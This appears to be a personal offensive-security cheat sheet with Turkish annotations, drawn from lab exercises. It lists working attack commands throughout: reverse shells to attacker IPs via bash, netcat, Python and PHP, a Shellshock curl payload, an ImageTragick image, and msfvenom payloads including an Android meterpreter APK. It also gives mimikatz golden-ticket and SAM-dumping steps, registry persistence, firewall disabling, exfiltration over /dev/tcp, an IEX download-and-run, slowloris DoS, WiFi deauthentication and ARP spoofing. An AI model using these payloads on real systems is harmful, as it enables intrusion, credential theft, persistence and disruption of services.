/bin/bash -i yada python3 -c 'import pty; pty.spawn("/bin/bash")'
-m ---> Hash türünü belirtmek için kullanılır.
0 ---> Kütüphanede ki hash'in sayısı
" " ---> İki tırnak arası Hash'in geleceği yer.
/usr/share/wordlists/rockyou.txt ---> Hangi wordlist'i kullanacaksanız onu yazacağınız yer.
--force ---> Uyarıları geçer.
hashcat -m 0 -a 0 "UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds" /usr/share/wordlists/rockyou.txt --force
hashcat -m 0 -a 0 "UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds" /usr/share/wordlists/rockyou.txt --show
hashcat -a 3 ?d?d?d?d --stdout
ashcat -m 0 -a 3 "e48e13207341b6bffb7fb1622282247b" ?d?d?d?d
-o ---> dosyanın çıktısının ismi.
gcc -o örnek.c/py/rb
python3 -m http.server
nmap -sV -sC -A -T4 <ip.adress>
nmap -iL list_of_hosts.txt
nmap -PR -sn 10.10.210.6/24
nmap -sS -Pn -g 80 -F MACHINE_IP
nmap -sU -Pn -g 53 -F MACHINE_IP
nmap -sS HTTP://PROXY_HOST1:8080,SOCKS4://PROXY_HOST2:4153 MACHINE_IP
nmap -sS -Pn --proxies 10.10.13.37 MACHINE_IP
nmap -sS -Pn -F MACHINE_IP
nmap -sS -Pn -f -F MACHINE_IP
nmap -sS -Pn -ff -F MACHINE_IP
nmap -sS -Pn --mtu 8 -F MACHINE_IP
nmap -sS -Pn --data-length 64 -F MACHINE_IP
-S IP_ADDRESS
--ip-options "L 10.10.10.50 10.10.50.250"
--ip-options "S 10.10.10.1 10.10.20.2 10.10.30.3"
--script-args http.useragent="CUSTOM_AGENT"
--spoof-mac MAC_ADDRESS
-D DECOY1_IP1,DECOY_IP2,ME
-D RND,RND,ME
dirb http://<ip.adress> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF
john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt /root/Desktop/spider.txt ---> Hash formatını biliyorsanız -format=<buraya yazınız>
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
zip2john backup.zip > backup.hash ---> Zip şifrelerini hashlemek ve ardından kırmak için. ---> Kırmak istediğiniz zip > " hash çıktısının dosya adı "
hashcat -m 13600 backup.hash /usr/share/wordlists/rockyou.txt
ssh2john id_rsa > aa.txt ---> id_rsa'leri kırmak için.
john --wordlist=/tmp/single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=single-password-list.txt --rules=KoreLogic --stdout |grep "Tryh@ckm3"
sudo vi /etc/john/john.conf
[List.Rules:THM-Password-Attacks]
Az"[0-9]" ^[!@#$]
smbclient -L <ip.adress> ---> Full enum
smbclient //<ip.adress>/<Bakmak istediğiniz dosyanın ismi>
scp /root/37292.c <Kullanıcının ismi>@<ip.adress>:/tmp ---> Karşı tarafa ssh ile dosya aktarımı
scp <Kullanıcının ismi>@<ip.adress>:/home/james/Alien_autospy.jpg ---> Karşı taraftan ssh ile dosya çekme
echo -n "" | tr 'A-Za-z' 'N-ZA-Mn-za-m' ---> ROT13 hash decode
echo -n "Base64-Hash" | base64 -d ---> Base64 Hash decode
echo -n "Base64 Hash'e çevirmek istediğiniz kod. Örnek = (echo -n "bash -i >& /dev/tcp/10.8.50.72/4444 0>&1" | base64) " | base64
echo "<Yazmak istediğiniz şey >" > < İçine yazmak istediğiniz dosya/doküman>
echo 1 > /proc/sys/net/ipv4/ip_forward ---> IP forward
echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > /etc/print.sh
echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.1.69",4486));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'" > cow.sh
echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.1.69 4485 >/tmp/f" > admin_checks
echo -n "bash -i >& /dev/tcp/10.8.50.72/4444 0>&1" | base64
wpscan --url < URL > -e vp,u ---> '-e' = Enum || vp ---> Vulnerable plugins || u ---> Users
wpscan --url < URL > --username elyana --password /usr/share/wordlists/rockyou.txt ---> Wordpress bruteforce saldırı. Manuel.
wpscan --url jack.thm -e u -P /usr/share/wordlists/rockyou.txt ---> Wordpress bruteforce saldırı. Otomatik.
gobuster dir -u < URL > -w < Wordlist >
gobuster dir -u < URL > -w < Wordlist > -x php,txt,html,bak,old,tar,gz,tgz,zip,7z ---> '-x' uzantılı dosyaları aramak için kullan.
gobuster dir -U < User > -P < Şifre > -u < URL > -w < Wordlist > ---> Id ve Şifre verilmesi gereken yer için.
steghide info < Img ismi > ---> Resimde saklı herhangi bir dosya var mı ?
steghide extract -sf < Img ismi > ---> Resimde saklı dosya varsa çıkart.
ifconfig eth0 down ---> ETH0 bağlantısını keser.
ifconfig eth0 hw ether 00:11:22:33:44:55 ---> İstediğin MAC adresini atar.
ifconfig eth0 up ---> ETH0 bağlantısını kurar.
sqlmap -r request --dbs --batch ---> Database ve kullanıcıları çıkarır.
sqlmap -r request --dbs --batch -D wordpress --tables ---> Database'de ki tabloları gösterir.
sqlmap -r request --dbs --batch -D wordpress -T wp_users --columns ---> Database'de ki kolonları gösterir.
sqlmap -r request --dbs --batch -D wordpress -T wp_users -C user_email,user_pass --sql-query "Select user_email,user_pass from wp_users" ---> Database'den istediğimiz bilgileri çekmek.
sqlmap -r request --dump -D wordpress -T wp_users ---> Wordpress kullanılmışsa Wordpress kullanıcılarını çekme.
http://10.10.85.123/wordpress/wp-content/themes/twentytwenty/404.php ---> Wordpress dosyalarında 404.php'de değişiklik yaptığında gideceğin yer.
Invoke-WebRequest <resource_to_download> -outfile <output_file_name>
gobuster dir -u 10.10.111.215 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ---> Basit kullanım
gobuster dir -u 10.10.150.189 -w /usr/share/wordlists/dirb/common.txt ---> Basit kullanım
gobuster dir -u 10.10.150.189 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html ---> php,txt,html uzantılıları da arama
gobuster dir -U joker -P hannah -u http://10.10.9.219:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /usr/share/wordlists/dirb/common.txt ---> user ve password girerek bak,old,tar,gz,tgz,zip,7z uzantıları arama.
gobuster vhost -u http://vulnnet.thm -w /usr/share/wordlists/dirb/common.txt
sudo -l ls -la
sudo -u toby /bin/bash
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
import os os.system("/bin/bash")
hydra -l joker -P /usr/share/wordlists/rockyou.txt 10.10.9.219 ssh -vV
hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10
hydra -l fox -P /usr/share/wordlists/rockyou.txt -f 10.10.32.242 http-get ----> Basic Auto - Get Metod.
hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.225.50 -vV
hydra hogwartz-castle.thm http-form-post "/login/index.php:user=^USER^&password=^PASS^:Incorrect Username or Password" -l Hagrid -P /usr/share/wordlists/rockyou.txt
hydra -l admin -P rockyou.txt 10.10.159.24 http-post-form “/login/index.php:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid” -f -vV ***
hydra -l admin -P rockyou.txt 10.10.159.24 http-post-form “/login/index.php:user=^USER^&pass=^PASS^&Login=Login:F=Err” -f -vV ***
hydra -l boris -P /usr/share/wordlists/rockyou.txt pop3://10.10.117.44:55007 -Vv
hydra -l pittman@clinic.thmredteam.com -P clinic.lst smtp://10.10.27.216 -vV
hydra -l phillips -P clinic.txt 10.10.129.191 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
hydra -l phillips -P clinic.txt 10.10.129.191 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
hashid -m $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.229 4485 >/tmp/f
-c 'bash -i >& /dev/tcp/10.9.1.69/4486 0>&1'
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.0.229/4485 0>&1'");
php -r '$sock=fsockopen("10.9.0.229",4485);exec("/bin/sh -i <&3 >&3 2>&3");'
&1|nc 10.9.0.229 4485 >/tmp/f'); ?>arp-scan -I eth0 192.168.240.128/24
arp -a
ssh -i id_rsa jessie@10.10.176.189
10.10.4.54/shell.php?cmd=nc%2010.9.1.69%204485%20-e%20/bin/bash
http://10.10.216.6:22/nnxhweOV/index.php?cmd=nc%20-e%20/bin/bash%2010.11.9.81%2080%209999
find / -name elyana 2>/dev/null - - - - SHELL=/bin/bash script -q /dev/nulls - Meterpreter
find / -user hermonine -type f 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
find / -user root -perm -4000 -executable -type f 2>/dev/null
find / -type f -name "proof.txt" -exec ls -l {} + 2>/dev/null
find / -type f -group lxd -exec ls -l {} + 2>/dev/null
find / -type f ( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiM0 -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy ) -exec ls -la {} ; 2>/dev/null
ltrace /usr/sbin/checker
docker images
docker run -v /:/mnt --rm -it bash chroot /mnt bash
head asd.txt -c 9
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.9.1.69/4485 0>&1' http://10.10.183.66/cgi-bin/test.cgi
curl 'http://10.10.90.19/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.9.0.229/4485 0>&1' -H "Content-Type: text/plain"
curl -s http://www.team.thm/scripts/script.old
curl -s 10.10.83.164 -D header.txt
curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:/ -i
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:/
curl -H 'Cookie: PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:/
curl -u admin:admin http://<SERVER_IP>:/
curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:/
curl 'http://<SERVER_IP>:/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4='
curl http://ATTACKER_IP:PORT/payload.php --output payload.php
gpg --import priv.key
gpg --decrypt-file CustomerDetails.xlsx.gpg
gpg2john private.asc > pgp.hash
cat > /home/toby/jobs/cow.sh << EOF #!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.1.69",4485));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' EOF
cat > bak.py << EOF #!/usr/bin/env python import pty pty.spawn("/bin/bash") EOF
cat > image.png << EOF
cat > image.png << EOF push graphic-context encoding "UTF-8" viewbox 0 0 1 1 affine 1 0 0 1 0 0 push graphic-context image Over 0,0 1,1 '|/bin/bash -i > /dev/tcp/10.8.50.72/4444 0<&1 2>&1' pop graphic-context pop graphic-context EOF
wfuzz -c -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://dev.team.thm/script.php?page=FUZZ --hw=0
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz -w /usr/share/wordlists/dirb/common.txt --hc=404 "http://10.10.244.142:5000/api/v1/resources/books?FUZZ=/etc/passwd"
ffuf -w wordlist.txt -u https://target .com/FUZZ -mc 200
getcap -r / 2>/dev/null
enum4linux -a 10.10.16.141
xxd thm.jpg | head
printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01' | dd conv=notrunc of=thm.jpg bs=1
openssl passwd -1 -salt "inferno" "dante"
printf 'inferno:$1$inferno$vA66L6zp5Qks4kxIc3tvn/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
rabin2 -z need_to_talk
netstat -putan
netstat -na
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.229 4485 >/tmp/f" > /home/server-management/Documents/rev.sh
./socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22
"!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"
cd /d d:
ECHO $SHELL chsh -s /bin/bash root
OR ---> veya için kullanılır.
inurl: ---> urlde geçen sonuçlar için.
intitle: ---> Etikette geçen ifadeleri görmek için.Örn: intitle:"webcamxp 5"
intext: ---> Textlerde geçen ifadeler için.
filetype: ---> Verilecek olan ifadenin dosya biçimine göre arama yapar. Örn: filetype:pdf hacking ---> Hacking kelimesini içeren pdf dosyaları.
allintext: ---> Tüm textin içerisinde arama yapmak için. Örn: allintext:"@gmail.com"
buildwith.com
netdiscover -r 182.154.164.1/24
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
nc -lvnp 10.10.10.10 80
C:\Users\Windows\AppData\Local\Programs\Python\Python310\python.exe -m install pyinstaller
C:\Users\Windows\AppData\Local\Programs\Python\Python310\Scripts\pyinstaller.exe test.py --onefile
C:\Users\Windows\AppData\Local\Programs\Python\Python310\Scripts\pyinstaller.exe test.py --onefile --add-file "C\Users\Defult\Desktop\kal.pdf;."
C:\Users\Windows\AppData\Local\Programs\Python\Python310\Scripts\pyinstaller.exe test.py --onefile --add-file "C\Users\Defult\Desktop\kal.pdf;." --noconsole
C:\Users\Windows\AppData\Local\Programs\Python\Python310\Scripts\pyinstaller.exe test.py --onefile --add-file "C\Users\Defult\Desktop\kal.pdf;." --noconsole --icon C\Users\Defult\Desktop\kal.pdf
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v upgrade /t REG_SZ /d "C:\Users\AppData\upgrade.exe"
generic_send_tcp 10.10.10.10 9999 spike.spk 0 0
cd /usr/share/metasploit-framework/tools/exploit - ./pattern_create.rb -l 3000 - ./pattern_offset.rb -l -q ---> EIP değeri
cd /usr/share/metasploit-framework/tools/exploit ./nasm_shell.rb ---> JMP ESP
!mona modules - !mona find -s "\xff\xe4" -m < seçilen dll yada çalışan exe > ## ---> FFE4 output nasm shell.rb
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" ---> badcharacter
locate < dosyanın tam adı >
./ngrok tcp 4444
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=1234 R > /root/Desktop/exploit.apk -i 20
service postgresql start
msfconsole use exploit/multi/handler set payload - LHOST=0.0.0.0 - LPORT=4444
msfvenom -p windows/meterpreter/reverse_http LHOST=tun0 LPORT=80 HttpUserAgent=NotMeterpreter -f exe -o shell.exe
install jdk
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore ngroktest.apk alias_name
jarsigner -verify -verbose -certs android_shell.apk
setxkbmap tr
apktool d app-debug-apk
apktool b app-debug -o newapk.apk
jadx -d appdebug appdebug.apk
jadx -d appdebug appdebug.apk --deobf
https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/cities/LA
https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/<Koleksiyon Adı>
curl -X GET "https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/<Koleksiyon Adı>";
curl -X DELETE "https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/<Koleksiyon Adı>/";
slowhttptest -c 1000 -H -r 200 -c 400 -i 10 -t POST -l 3600 -o ~/Desktop/slow-test1 -g -u https://pentesturl.xyz
slowhttptest -c 3000 -X -r 200 -w 4096 -y 8192 -i 10 -t POST -n 3 -z 32 -x 24 -k 2 -p 2 -l 3600 -o ~/Desktop/slow-test2 -g -u https://pentesturl.xyz
slowhttptest -c 1000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 o- ~/Desktop/slow-test3 -g -u https://pentesturl.xyz
slowhttptest -c 1000 -X -r 200 -w 20 -y 40 -n 5 -z 32 -k 3 o- ~/Desktop/slow-test4 -g -u https://pentesturl.xyz
slowhttptest -c 2000 -X -r 200 -w 2048 -y 4096 -n 3 -z 32 -k 2 -p 3 -l 3600 -o ~/Desktop/slow-test5 -g -u https://pentesturl.xyz
slowhttptest -c 3000 -B -r 300 -i 100 -s 8192 -t fakeverb -p 3 -x 20 -o ~/Desktop/slow-test6 -g -u https://pentesturl.xyz
airmon-ng start wlan0
airmon-ng check kill
airodump-ng wlan0mon
airodump-ng --channel 8 --bssid 11:22:33:44:55:66 --write airodump wlan0mon
aircrack-ng wepcrack01.cap
aircrack-ng handshake-file-01.cap -w testwordlist
aireplay-ng --deauth 5 -a 11:22:33:44:55:66 wlan0mon
aireplay-ng --deauth 5 -a 11:22:33:44:55:66 -c 55:44:88:66:11:22 wlan0mon
iwconfig
ifconfig wlan0 down
ifconfig wlan0 mode monitor
ifconfig wlan0 up
am start -n com.android.asdad/.PostLogin
content query --uri content://com.android.asdasd.TrackUserContentProvider/trackusers
crunch 8 9 xy123 -o testwordlists
crunch 6 6 -t pass%%
crunch 2 2 01234abcd -o crunch.txt
crunch 5 5 -t "THM^^" -o tryhackme.txt
bettercap -iface wlan0
net.probe on
net.show
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.22, 192.168.1.24
arp.spoof on
net.sniff on
lsof -i 80
cycript -p
UIApp
UIApp.keyWindow.rootViewController -- Cycript Tricks
printMethods("ViewController")
UIApp.keyWindow.rootViewController = [[SecondViewController alloc]init]
ViewController.prototype.isJailbroken = function() {return false;}
lsadumb:Sam
privilege::debug
lsadump::lsa /patch
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
misc::cmd
use exploit/windows/local/persistence
set EXE::CUSTOM payload.exe
whois thmredteam.com
nslookup cafe.thmredteam.com
dig @1.1.1.1 tryhackme.com
host clinic.thmredteam.com
traceroute clinic.thmredteam.com
shodan host 167.86.125.151
workspaces create thmredteam
recon-ng -w WORKSPACE_NAME
recon-ng -r asd
db insert domains
marketplace search domains-
marketplace install google_site_web
modules load viewdns_reverse_whois
options list
options set
keys list
keys add KEY_NAME KEY_VALUE
keys remove KEY_NAME
cat /etc/apache2/sites-available/000-default.conf | grep -v '#'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^NotMeterpreter$"
ProxyPass "/" "http://localhost:8080/"
Dim message
message = "Welcome to THM"
MsgBox message
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
wscript c:\Users\thm\Desktop\payload.vbs
cscript.exe c:\Users\thm\Desktop\payload.vbs
wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
<script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); </script>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
use exploit/windows/misc/hta_server
Sub Document_Open()
THM
End Sub
Sub AutoOpen()
THM
End Sub
Sub THM()
MsgBox ("Welcome to Weaponization Room!")
End Sub
Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba
powershell -File thm.ps1
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
powershell -ex bypass -File thm.ps1
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"
https://default-password.info/
https://datarecovery.com/rd/default-passwords/
cat file1.txt file2.txt file3.txt > combined_list.txt
sort combined_list.txt | uniq -u > cleaned_combined_list.txt
python3 username_generator.py -h
echo "John Smith" > users.lst
python3 username_generator.py -w users.lst
git clone https://github.com/Mebus/cupp.git
python3 cupp.py
python3 cupp.py -i
python3 cupp.py -l
python3 cupp.py -a
python3 RDPassSpray.py -U usernames-list.txt -p Spring2021! -d THM-labs -T RDP_servers.txt
systeminfo | findstr Domain
Get-ADUser -Filter *
Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM"
wmic /namespace:\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
Get-NetFirewallProfile | Format-Table Name, Enabled
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Get-NetFirewallRule | select DisplayName, Enabled, Description
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
Get-MpThreat
Get-NetFirewallRule | findstr "Rule-Name"
Get-EventLog -List
Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }
Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"
Get-Service | where-object {$_.DisplayName -like "sysm"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
wmic product get name,version
Get-ChildItem -Hidden -Path C:\Users\kkidd\Desktop\
wmic service where "name like 'THM Demo'" get Name,PathName
Get-Process -Name thm-demo
netstat -noa |findstr "LISTENING" |findstr "3212"looku
nslookup.exe
server 10.10.191.199
ls -d thmredteam.com
ls /etc/*-release
hostname / who / whoami / w / id / last / sudo -l
cat /etc/passwd / cat /etc/resolv.conf / cat /etc/shadow
/etc/group
ls -lh /var/mail/
dpkg -l / dpkg -qa
ip a s
sudo netstat -plt / sudo netstat -atupn / sudo lsof -i / sudo lsof -i :25
ps axf / ps -f / ps aux / ps -ef | grep peter
systeminfo / whoiam / whoami /priv / whoami /groups / net user / net group / net localgroup / net localgroup administrators / net accounts / net accounts /domain
ipconfig / netstat -abno
wmic qfe get Caption, Description
net start
wmic product get name,version,vendor
snmpcheck 10.10.10.10 -c Community
snmpwalk -v1 -c public 10.10.10.10
C:\Unattend.xml / C:\Windows\Panther\Unattend.xml / C:\Windows\Panther\Unattend\Unattend.xml / C:\Windows\system32\sysprep.inf / C:\Windows\system32\sysprep\sysprep.xml
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cmdkey /list / runas /savecred /user:admin cmd.exe
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
schtasks / schtasks /query /tn vulntask /fo list /v / icacls: / icacls c:\tasks\schtask.bat
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
sc qc apphostsvc
icacls C:\PROGRA2\SYSTEM1\WService.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe / cd C:\PROGRA2\SYSTEM1\ / move WService.exe WService.exe.bkp / move C:\Users\thm-unpriv\rev-svc.exe WService.exe / icacls WService.exe /grant Everyone:F
whoami /priv / reg save hklm\system C:\Users\THMBackup\system.hive / reg save hklm\sam C:\Users\THMBackup\sam.hive / mkdir share / python3 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
copy C:\Users\THMBackup\sam.hive \ATTACKER_IP\public\ / python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL ----> Devamı TryhackMe RedTeam Windows Priv.
net localgroup administrators thmuser0 /add
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
evil-winrm -i 10.10.110.249 -u thmuser1 -p Password321
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
reg save hklm\system system.bak / reg save hklm\system sam.bak
download system.bak / download sam.bak
python3 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
evil-winrm -i 10.10.110.249 -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3
nc -lvp 8080 > /tmp/task4-creds.data
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
tar xvf task4-creds.tar
tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -
python3 neoreg.py generate -k thm
upload tunnel.php
python3 neoreg.py -k thm -u http://10.10.127.144/uploader/files/tunnel.php
curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
ncat -lvnp PORT_NUM
ncat TARGET_IP PORT_NUM
ncat -ulvnp PORT_NUM
nc -u TARGET_IP PORT_NUM
nc ATTACKER_IP 80
ncat -lvnp 1234 -e /bin/bash ---> base64 input.txt to encode
urlencode ncat -lvnp 1234 -e /bin/bash
ncat -lvnp 443 -c "ncat TARGET_SERVER 25"
ncat -lvnp PORT_NUMBER -e /bin/bash
ncat -lvnp Attacker_IP PORT_NUM -e /bin/bash
commix --url="http://10.10.10.10/OS.php" --cookie="cookie" --data="data"
wafw00f URL
dotdotpwn -m http -h URL -S
nikto -h URL